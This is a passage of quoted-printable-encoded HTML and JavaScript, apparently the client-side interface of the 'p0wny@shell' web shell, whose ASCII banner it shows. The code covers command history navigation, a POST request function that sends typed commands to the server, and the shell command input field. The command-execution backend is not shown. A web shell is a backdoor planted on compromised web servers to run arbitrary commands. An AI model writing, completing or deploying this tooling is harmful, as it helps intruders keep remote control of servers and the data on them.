=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20if=
=20(historyPosition=20>=200)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20historyPosition--;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20eShellCmdInput.blur();
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20eShellCmdInput.value=20=3D=20commandHistory[historyPosition];
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20_defer(function()=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20=20=20=20=20eShellCmdInput.focus();
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20});
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20bre=
ak;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20case=20"ArrowDo=
wn":
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20if=
=20(historyPosition=20>=3D=20commandHistory.length)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20break;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20his=
toryPosition++;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20if=
=20(historyPosition=20=3D=3D=3D=20commandHistory.length)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20eShellCmdInput.value=20=3D=20"";
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}=
=20else=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20eShellCmdInput.blur();
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20eShellCmdInput.focus();
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20eShellCmdInput.value=20=3D=20commandHistory[historyPosition];
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20bre=
ak;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20case=20'Tab':
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20eve=
nt.preventDefault();
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20fea=
tureHint();
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20bre=
ak;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20function=20insertToHistory(cmd)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20commandHistory.push(cmd);
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20historyPosition=20=3D=20com=
mandHistory.length;
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20function=20makeRequest(url,=20params,=
=20callback)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20function=20getQueryString()=
=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20var=20a=20=3D=
=20[];
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20for=20(var=20ke=
y=20in=20params)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20if=
=20(params.hasOwnProperty(key))=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20a.push(encodeURIComponent(key)=20+=20"=3D"=20+=20encodeURIComponen=
t(params[key]));
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20return=20a.join=
("&");
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20var=20xhr=20=3D=20new=20XML=
HttpRequest();
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20xhr.open("POST",=20url,=20t=
rue);
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20xhr.setRequestHeader("Conte=
nt-Type",=20"application/x-www-form-urlencoded");
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20xhr.onreadystatechange=20=
=3D=20function()=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20if=20(xhr.ready=
State=20=3D=3D=3D=204=20&&=20xhr.status=20=3D=3D=3D=20200)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20try=
=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20var=20responseJson=20=3D=20JSON.parse(xhr.responseText);
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20callback(responseJson);
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}=
=20catch=20(error)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20alert("Error=20while=20parsing=20response:=20"=20+=20error);
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20};
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20xhr.send(getQueryString());
=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20document.onclick=20=3D=20function(event=
)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20event=20=3D=20event=20||=20=
window.event;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20var=20selection=20=3D=20win=
dow.getSelection();
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20var=20target=20=3D=20event.=
target=20||=20event.srcElement;

=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20if=20(target.tagName=20=3D=
=3D=3D=20"SELECT")=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20return;
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}

=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20if=20(!selection.toString()=
)=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20eShellCmdInput.=
focus();
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20}
=20=20=20=20=20=20=20=20=20=20=20=20};

=20=20=20=20=20=20=20=20=20=20=20=20window.onload=20=3D=20function()=20{
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20eShellCmdInput=20=3D=20docu=
ment.getElementById("shell-cmd");
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20eShellContent=20=3D=20docum=
ent.getElementById("shell-content");
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20updateCwd();
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20eShellCmdInput.focus();
=20=20=20=20=20=20=20=20=20=20=20=20};
=20=20=20=20=20=20=20=20</script>
=20=20=20=20</head>

=20=20=20=20<body>
=20=20=20=20=20=20=20=20<div=20id=3D"shell">
=20=20=20=20=20=20=20=20=20=20=20=20<pre=20id=3D"shell-content">
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20<div=20id=3D"shell-logo">
=20=20=20=20=20=20=20=20___=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20=20=20=20=20=20=20____=20=20=20=20=20=20_=20=20=20=20=20=20=20=20=
=20=20_=20_=20=20=20=20=20=20=20=20_=20=20_=20=20=20<span></span>
=20_=20__=20=20/=20_=20\__=20=20=20=20=20=20___=20__=20=20_=20=20=20_=20=20=
/=20__=20\=20___|=20|__=20=20=20___|=20|=20|_=20/\/||=20||=20|_=20<span></s=
pan>
|=20'_=20\|=20|=20|=20\=20\=20/\=20/=20/=20'_=20\|=20|=20|=20|/=20/=20_`=20=
/=20__|=20'_=20\=20/=20_=20\=20|=20(_)/\/_=20=20..=20=20_|<span></span>
|=20|_)=20|=20|_|=20|\=20V=20=20V=20/|=20|=20|=20|=20|_|=20|=20|=20(_|=20\_=
_=20\=20|=20|=20|=20=20__/=20|=20|_=20=20=20|_=20=20=20=20=20=20_|<span></s=
pan>
|=20.__/=20\___/=20=20\_/\_/=20|_|=20|_|\__,=20|\=20\__,_|___/_|=20|_|\___|=
_|_(_)=20=20=20=20|_||_|=20=20<span></span>
|_|=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20|___/=20=20\____/=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20<span></span>
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20</div>
=20=20=20=20=20=20=20=20=20=20=20=20</pre>
=20=20=20=20=20=20=20=20=20=20=20=20<div=20id=3D"shell-input">
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20<label=20for=3D"shell-cmd"=
=20id=3D"shell-prompt"=20class=3D"shell-prompt">???</label>
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20<div>
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20<input=20id=3D"=
shell-cmd"=20name=3D"cmd"=20onkeydown=3D"_onShellCmdKeyDown(event)"/>
=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20=20</div>
=20=20=20=20=20=20=20=20=20=20=20=20</div>
=20=20=20=20=20=20=20=20</div>
=20=20=20=20</body>

</html>
